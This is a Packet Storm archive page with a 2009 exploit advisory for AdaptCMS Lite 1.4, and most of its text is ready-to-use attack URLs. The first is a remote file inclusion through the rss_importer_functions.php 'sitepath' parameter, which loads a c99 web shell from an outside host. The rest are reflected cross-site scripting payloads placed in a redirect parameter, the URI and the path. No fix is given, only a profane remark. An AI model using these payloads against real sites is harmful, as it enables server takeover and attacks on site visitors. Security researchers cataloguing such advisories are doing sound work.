Lucene search

K
packetstormRoMaNcYxHaCkErPACKETSTORM:74776
HistoryFeb 09, 2009 - 12:00 a.m.

AdaptCMS Lite 1.4 RFI / XSS

2009-02-0900:00:00
RoMaNcYxHaCkEr
packetstormsecurity.com
12
`# AdaptCMS Lite 1,4 Multiple Vulnes ( Remote File Include , Remote XSS )  
  
# Free Download : http://213.203.218.125/a/ad/adaptcms/AdaptCMS_Lite_1.4.zip  
  
# Or : http://www.adaptcms.com/  
  
- Found By : RoMaNcYxHaCkEr  
- My Site : WwW.Sec-Code.CoM  
- My Group : Security - Codes Group  
  
# Exploit [1]:  
  
- Remote File Include :  
  
http://www.sec-code.com/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=http://www.sec-code.com/c99.txt?  
  
# Exploit [2]:  
  
- Remote XSS :  
  
http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?view=redirect&url=javascript:alert(413528022209)  
  
Cross Site Scripting in URI :  
  
http://www.sec-code.com/AdaptCMS_Lite_1.4_2/index.php?acuparam=>'><ScRiPt>alert(435038069432)</ScRiPt>  
  
Cross Site Scripting in path :  
  
http://www.sec-code.com/AdaptCMS_Lite_1.4_2/?=>"'><ScRiPt>alert(438948070551)</ScRiPt>  
  
# Solutions :  
  
Contact With Me I Will Declear All This Fucking Functions  
  
# rXh  
  
# bEST wISHES  
  
`